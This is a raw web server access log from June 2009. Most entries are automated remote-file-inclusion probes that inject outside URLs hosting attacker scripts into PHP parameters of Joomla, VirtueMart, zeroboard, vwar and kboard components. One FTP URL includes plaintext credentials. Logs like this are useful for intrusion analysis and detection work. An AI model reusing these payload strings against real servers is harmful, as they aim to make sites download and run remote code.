211.172.225.50 - - [26/Jun/2009:11:16:17 -0500] "GET /logs//include/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:16:17 -0500] "GET /logs/access_log.1230422400//include/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:16:18 -0500] "GET //include/main.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:16:26 -0500] "GET /logs//include/main.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:16:26 -0500] "GET /logs/access_log.1230422400//include/main.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
80.247.76.181 - - [26/Jun/2009:11:17:58 -0500] "GET /logs//index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:11:17:58 -0500] "GET //index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:11:17:58 -0500] "GET //index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:11:17:58 -0500] "GET /logs//index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:11:17:58 -0500] "GET //index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:11:17:58 -0500] "GET /logs//index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:11:18:48 -0500] "GET //index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:11:18:48 -0500] "GET /logs//index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:11:18:49 -0500] "GET /logs//index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:11:18:49 -0500] "GET //index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:11:18:51 -0500] "GET /logs//index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:11:18:51 -0500] "GET //index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.206.120.187 - - [26/Jun/2009:11:19:28 -0500] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:11:19:28 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:11:19:29 -0500] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
173.15.28.165 - - [26/Jun/2009:11:19:44 -0500] "GET //index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
173.15.28.165 - - [26/Jun/2009:11:19:44 -0500] "GET /logs//index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
210.205.57.2 - - [26/Jun/2009:11:20:33 -0500] "GET /logs/components/com_jombib/BibTex.php?GLOBALS[mosConfig_absolute_path]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
210.205.57.2 - - [26/Jun/2009:11:20:33 -0500] "GET /components/com_jombib/BibTex.php?GLOBALS[mosConfig_absolute_path]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
210.205.57.2 - - [26/Jun/2009:11:20:39 -0500] "GET /logs/components/com_jombib/BibTex.php?GLOBALS[mosConfig_absolute_path]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
210.205.57.2 - - [26/Jun/2009:11:20:39 -0500] "GET /components/com_jombib/BibTex.php?GLOBALS[mosConfig_absolute_path]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
211.206.120.187 - - [26/Jun/2009:11:20:55 -0500] "GET /logs/access_log.1230336000//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
173.15.28.165 - - [26/Jun/2009:11:21:15 -0500] "GET //index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
173.15.28.165 - - [26/Jun/2009:11:21:15 -0500] "GET /logs//index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
204.62.54.203 - - [26/Jun/2009:11:24:17 -0500] "GET /?D=D HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
211.172.225.50 - - [26/Jun/2009:11:25:00 -0500] "GET //include/error.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:25:00 -0500] "GET /logs//include/error.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:25:00 -0500] "GET /logs/access_log.1230422400//include/error.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:25:03 -0500] "GET //include/error.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:25:03 -0500] "GET /logs//include/error.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:25:03 -0500] "GET /logs/access_log.1230422400//include/error.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.0.145.1 - - [26/Jun/2009:11:25:46 -0500] "GET /logs/access_log.1235606400/mygallerybrowser.php?myPath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
124.0.145.1 - - [26/Jun/2009:11:25:46 -0500] "GET /mygallerybrowser.php?myPath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
124.0.145.1 - - [26/Jun/2009:11:25:46 -0500] "GET /logs/mygallerybrowser.php?myPath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:25:51 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
124.0.145.1 - - [26/Jun/2009:11:25:55 -0500] "GET /logs/access_log.1237766400/mygallerybrowser.php?myPath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:25:58 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:25:58 -0500] "GET /logs/access_log.1230422400//skin/zero_vote/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:25:58 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:25:58 -0500] "GET /logs/access_log.1230422400//skin/zero_vote/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:25:58 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
131.203.76.246 - - [26/Jun/2009:11:26:16 -0500] "GET /logs/2%20/skin/zero_vote/ask_password.php?dir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
131.203.76.246 - - [26/Jun/2009:11:26:16 -0500] "GET /2%20/skin/zero_vote/ask_password.php?dir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
131.203.76.246 - - [26/Jun/2009:11:26:16 -0500] "GET /logs/access_log.1234224000/2%20/skin/zero_vote/ask_password.php?dir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
131.203.76.246 - - [26/Jun/2009:11:26:47 -0500] "GET /logs/access_log.1234137600/2%20/skin/zero_vote/ask_password.php?dir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:11:26:49 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:11:26:49 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:11:26:53 -0500] "GET /logs/access_log.1230076800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
91.142.209.134 - - [26/Jun/2009:11:27:33 -0500] "GET //npovorg_bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:11:27:33 -0500] "GET /logs//npovorg_bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
66.11.230.36 - - [26/Jun/2009:11:28:51 -0500] "GET /logs/access_log.1230076800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:11:28:51 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:11:28:51 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.55.107.179 - - [26/Jun/2009:11:28:53 -0500] "GET /logs/access_log.1228867200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.11.230.36 - - [26/Jun/2009:11:31:38 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:11:31:38 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:11:32:08 -0500] "GET /logs/access_log.1230076800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:33:36 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:33:36 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/ask_password.php?dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:33:36 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:33:43 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:33:44 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:33:45 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:33:45 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:34:57 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:34:58 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:34:58 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/ask_password.php?dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:35:15 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/ask_password.php?dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:36:12 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/idxx.txt%20? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:36:13 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/idxx.txt%20? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:36:14 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/idxx.txt%20? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.121.137.51 - - [26/Jun/2009:11:37:16 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:11:37:16 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
125.248.150.52 - - [26/Jun/2009:11:37:29 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.248.150.52 - - [26/Jun/2009:11:37:29 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
125.248.150.52 - - [26/Jun/2009:11:37:30 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:37:35 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/idxx.txt%20? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:37:35 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/idxx.txt%20? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.137.51 - - [26/Jun/2009:11:37:38 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:11:37:38 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
65.55.106.239 - - [26/Jun/2009:11:37:54 -0500] "GET /logs/access_log.1151798400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.248.150.52 - - [26/Jun/2009:11:38:09 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:38:23 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/ask_password.php?dir=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:11:39:15 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:11:39:15 -0500] "GET /logs/access_log.1239408000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:11:39:16 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:40:07 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:11:41:23 -0500] "GET /logs/access_log.1239408000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:11:41:28 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:41:44 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/idxx.txt%20? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:11:42:36 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.106.179.130 - - [26/Jun/2009:11:43:57 -0500] "GET /logs//index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [26/Jun/2009:11:43:57 -0500] "GET //index.php?zboard=http://goldenglasscompany.com//images/ivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.55.106.164 - - [26/Jun/2009:11:44:25 -0500] "GET /logs/access_log.1137283200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.11.230.36 - - [26/Jun/2009:11:45:55 -0500] "GET /logs/access_log.1240444800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
201.9.250.138 - - [26/Jun/2009:11:46:59 -0500] "GET /logs/access_log.1231804800ftp://sln:solon000@ftp.xpg.com.br/cmd4.txt? HTTP/1.1" 404 351 "-""Mozilla/3.0 (compatible; Indy Library)"
201.9.250.138 - - [26/Jun/2009:11:46:59 -0500] "GET /logs/access_log.1231286400ftp://sln:solon000@ftp.xpg.com.br/cmd4.txt? HTTP/1.1" 404 351 "-""Mozilla/3.0 (compatible; Indy Library)"
201.9.250.138 - - [26/Jun/2009:11:47:17 -0500] "GET /logs/access_log.1231804800ftp://sln:solon000@ftp.xpg.com.br/cmd4.txt? HTTP/1.1" 404 351 "-""Mozilla/3.0 (compatible; Indy Library)"
65.55.230.168 - - [26/Jun/2009:11:47:57 -0500] "GET /logs/access_log.1145232000 HTTP/1.1" 200 3030 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
123.143.98.5 - - [26/Jun/2009:11:49:01 -0500] "GET /errors.php?error=http://www.geocities.com/antek_electro/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
123.143.98.5 - - [26/Jun/2009:11:49:01 -0500] "GET /logs/errors.php?error=http://www.geocities.com/antek_electro/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
123.143.98.5 - - [26/Jun/2009:11:49:03 -0500] "GET /logs/access_log.1228694400/errors.php?error=http://www.geocities.com/antek_electro/id.txt?%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
123.143.98.5 - - [26/Jun/2009:11:49:09 -0500] "GET /errors.php?error=http://www.geocities.com/antek_electro/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
123.143.98.5 - - [26/Jun/2009:11:49:09 -0500] "GET /logs/errors.php?error=http://www.geocities.com/antek_electro/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
123.143.98.5 - - [26/Jun/2009:11:49:09 -0500] "GET /logs/access_log.1228694400/errors.php?error=http://www.geocities.com/antek_electro/id.txt?%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
72.82.228.83 - - [26/Jun/2009:11:50:35 -0500] "GET ///vwar/backup/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:11:50:35 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:11:50:35 -0500] "GET /logs/access_log.1229126400///vwar/backup/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:11:50:35 -0500] "GET /logs/access_log.1225238400///vwar/backup/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:11:51:24 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:11:51:24 -0500] "GET ///vwar/backup/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:11:51:24 -0500] "GET /logs/access_log.1225238400///vwar/backup/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:11:51:24 -0500] "GET /logs/access_log.1229126400///vwar/backup/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
125.248.150.52 - - [26/Jun/2009:11:55:57 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.248.150.52 - - [26/Jun/2009:11:55:57 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.140.23.185 - - [26/Jun/2009:11:57:29 -0500] "GET //?sIncPath=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
62.140.23.185 - - [26/Jun/2009:11:57:31 -0500] "GET /logs//?sIncPath=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 200 194790 "-""libwww-perl/5.803"
195.34.78.110 - - [26/Jun/2009:12:02:20 -0500] "GET //administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:12:02:20 -0500] "GET /logs//administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:12:02:20 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:12:02:24 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.142 - - [26/Jun/2009:12:04:58 -0500] "GET /logs/access_log.1170892800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.141 - - [26/Jun/2009:12:05:55 -0500] "GET /logs/access_log.1146096000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.34.78.110 - - [26/Jun/2009:12:08:25 -0500] "GET //pshop/shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:12:08:25 -0500] "GET /logs/access_log.1240531200//pshop/shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:12:08:25 -0500] "GET /logs//pshop/shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:12:10:04 -0500] "GET /logs/access_log.1241481600//pshop/shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
124.0.145.1 - - [26/Jun/2009:12:11:09 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
